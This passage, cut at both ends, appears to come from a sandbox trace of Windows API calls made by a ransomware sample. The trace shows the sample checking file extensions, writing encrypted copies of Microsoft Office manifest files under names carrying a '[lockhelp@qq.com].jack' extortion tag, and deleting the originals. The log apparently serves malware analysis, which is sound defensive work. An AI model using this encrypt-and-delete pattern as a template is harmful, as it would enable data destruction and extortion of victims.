lpString2=".xml") returned -1 [0204.695] lstrlenW (lpString=".7z") returned 3 [0204.695] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0204.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0204.695] lstrlenW (lpString=".dbf") returned 4 [0204.695] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0204.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0204.695] lstrlenW (lpString=".1cd") returned 4 [0204.695] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0204.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0204.695] lstrlenW (lpString=".jpg") returned 4 [0204.695] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0204.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0204.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0204.695] lstrlenW (lpString=".doc") returned 4 [0204.695] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0204.696] lstrlenW (lpString=".docx") returned 5 [0204.696] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0204.696] lstrlenW (lpString=".pdf") returned 4 [0204.696] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0204.696] lstrlenW (lpString=".xls") returned 4 [0204.696] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0204.696] lstrlenW (lpString=".xlsx") returned 5 [0204.696] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0204.696] lstrlenW (lpString=".ppt") returned 4 [0204.696] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0204.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0204.696] lstrlenW (lpString=".zip") returned 4 [0204.696] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0204.696] lstrlenW (lpString=".rar") returned 4 [0204.696] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0204.696] lstrlenW (lpString=".bz2") returned 4 [0204.696] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0204.696] lstrlenW (lpString=".7z") returned 3 [0204.696] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0204.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0204.696] lstrlenW (lpString=".dbf") returned 4 [0204.696] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0204.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0204.696] lstrlenW (lpString=".1cd") returned 4 [0204.696] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0204.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0204.697] lstrlenW (lpString=".jpg") returned 4 [0204.697] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0204.697] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0204.697] lstrlenW (lpString="AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 53 [0204.697] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0204.697] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=1261) returned 1 [0204.697] CloseHandle (hObject=0x3f4) returned 1 [0204.697] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0409-1000-0000000ff1ce.xml")) returned 0x220 [0204.698] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0204.698] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0204.698] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0204.698] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0204.698] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0204.698] GetLastError () returned 0x0 [0204.698] ReadFile (in: hFile=0x3f4, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0204.787] WriteFile (in: hFile=0x3ec, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0204.788] ReadFile (in: hFile=0x3f4, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0204.788] WriteFile (in: hFile=0x3ec, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x13e, lpOverlapped=0x0) returned 1 [0204.788] SetEndOfFile (hFile=0x3ec) returned 1 [0204.788] CloseHandle (hObject=0x3ec) returned 1 [0205.186] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.186] SetEndOfFile (hFile=0x3f4) returned 1 [0205.214] CloseHandle (hObject=0x3f4) returned 1 [0205.215] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0205.215] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0409-1000-0000000ff1ce.xml")) returned 1 [0205.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0205.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0205.215] lstrlenW (lpString=".doc") returned 4 [0205.215] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.215] lstrlenW (lpString=".docx") returned 5 [0205.215] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.215] lstrlenW (lpString=".pdf") returned 4 [0205.215] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.216] lstrlenW (lpString=".xls") returned 4 [0205.216] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.216] lstrlenW (lpString=".xlsx") returned 5 [0205.216] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.216] lstrlenW (lpString=".ppt") returned 4 [0205.216] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0205.216] lstrlenW (lpString=".zip") returned 4 [0205.216] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.216] lstrlenW (lpString=".rar") returned 4 [0205.216] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.216] lstrlenW (lpString=".bz2") returned 4 [0205.216] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.216] lstrlenW (lpString=".7z") returned 3 [0205.216] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0205.216] lstrlenW (lpString=".dbf") returned 4 [0205.216] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0205.216] lstrlenW (lpString=".1cd") returned 4 [0205.216] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0205.216] lstrlenW (lpString=".jpg") returned 4 [0205.216] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0205.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0205.216] lstrlenW (lpString=".doc") returned 4 [0205.216] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.217] lstrlenW (lpString=".docx") returned 5 [0205.217] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.217] lstrlenW (lpString=".pdf") returned 4 [0205.217] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.217] lstrlenW (lpString=".xls") returned 4 [0205.217] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.217] lstrlenW (lpString=".xlsx") returned 5 [0205.217] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.217] lstrlenW (lpString=".ppt") returned 4 [0205.217] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0205.217] lstrlenW (lpString=".zip") returned 4 [0205.217] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.217] lstrlenW (lpString=".rar") returned 4 [0205.217] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.217] lstrlenW (lpString=".bz2") returned 4 [0205.217] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.217] lstrlenW (lpString=".7z") returned 3 [0205.217] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0205.217] lstrlenW (lpString=".dbf") returned 4 [0205.217] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0205.217] lstrlenW (lpString=".1cd") returned 4 [0205.217] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0205.217] lstrlenW (lpString=".jpg") returned 4 [0205.217] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.218] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0205.218] lstrlenW (lpString="AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 53 [0205.218] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0054-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0205.219] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=1261) returned 1 [0205.219] CloseHandle (hObject=0x3f4) returned 1 [0205.219] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0054-0409-1000-0000000ff1ce.xml")) returned 0x220 [0205.219] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0054-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.219] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0054-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0205.219] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.219] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.220] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0054-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0205.220] GetLastError () returned 0x0 [0205.220] ReadFile (in: hFile=0x3f4, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0205.442] WriteFile (in: hFile=0x3e4, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0205.443] ReadFile (in: hFile=0x3f4, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0205.443] WriteFile (in: hFile=0x3e4, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x13e, lpOverlapped=0x0) returned 1 [0205.443] SetEndOfFile (hFile=0x3e4) returned 1 [0205.443] CloseHandle (hObject=0x3e4) returned 1 [0205.446] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.447] SetEndOfFile (hFile=0x3f4) returned 1 [0205.447] CloseHandle (hObject=0x3f4) returned 1 [0205.447] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0205.448] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0054-0409-1000-0000000ff1ce.xml")) returned 1 [0205.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0205.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0205.448] lstrlenW (lpString=".doc") returned 4 [0205.448] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.448] lstrlenW (lpString=".docx") returned 5 [0205.448] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.448] lstrlenW (lpString=".pdf") returned 4 [0205.448] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.448] lstrlenW (lpString=".xls") returned 4 [0205.448] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.448] lstrlenW (lpString=".xlsx") returned 5 [0205.448] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.448] lstrlenW (lpString=".ppt") returned 4 [0205.448] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0205.448] lstrlenW (lpString=".zip") returned 4 [0205.448] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.448] lstrlenW (lpString=".rar") returned 4 [0205.448] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.448] lstrlenW (lpString=".bz2") returned 4 [0205.449] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.449] lstrlenW (lpString=".7z") returned 3 [0205.449] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0205.449] lstrlenW (lpString=".dbf") returned 4 [0205.449] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0205.449] lstrlenW (lpString=".1cd") returned 4 [0205.449] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0205.449] lstrlenW (lpString=".jpg") returned 4 [0205.449] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0205.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0205.449] lstrlenW (lpString=".doc") returned 4 [0205.449] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.449] lstrlenW (lpString=".docx") returned 5 [0205.449] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.449] lstrlenW (lpString=".pdf") returned 4 [0205.449] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.449] lstrlenW (lpString=".xls") returned 4 [0205.449] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.449] lstrlenW (lpString=".xlsx") returned 5 [0205.449] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.449] lstrlenW (lpString=".ppt") returned 4 [0205.449] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0205.449] lstrlenW (lpString=".zip") returned 4 [0205.449] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.449] lstrlenW (lpString=".rar") returned 4 [0205.449] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.449] lstrlenW (lpString=".bz2") returned 4 [0205.450] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.450] lstrlenW (lpString=".7z") returned 3 [0205.450] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0205.450] lstrlenW (lpString=".dbf") returned 4 [0205.450] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0205.450] lstrlenW (lpString=".1cd") returned 4 [0205.450] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0205.450] lstrlenW (lpString=".jpg") returned 4 [0205.450] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.450] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0205.450] lstrlenW (lpString="AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 53 [0205.450] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0205.450] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=357349) returned 1 [0205.450] CloseHandle (hObject=0x3f4) returned 1 [0205.450] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0000-1000-0000000ff1ce.xml")) returned 0x220 [0205.450] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.451] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0205.451] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.451] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.451] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0205.453] GetLastError () returned 0x0 [0205.453] ReadFile (in: hFile=0x3f4, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x573e5, lpOverlapped=0x0) returned 1 [0205.600] WriteFile (in: hFile=0x3e4, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x573f0, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x573f0, lpOverlapped=0x0) returned 1 [0205.605] ReadFile (in: hFile=0x3f4, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0205.605] WriteFile (in: hFile=0x3e4, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x13e, lpOverlapped=0x0) returned 1 [0205.605] SetEndOfFile (hFile=0x3e4) returned 1 [0205.605] CloseHandle (hObject=0x3e4) returned 1 [0205.611] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.611] SetEndOfFile (hFile=0x3f4) returned 1 [0205.615] CloseHandle (hObject=0x3f4) returned 1 [0205.615] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0205.615] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0000-1000-0000000ff1ce.xml")) returned 1 [0205.615] lstrlenW (lpString="C:\\Program Files\\Microsoft 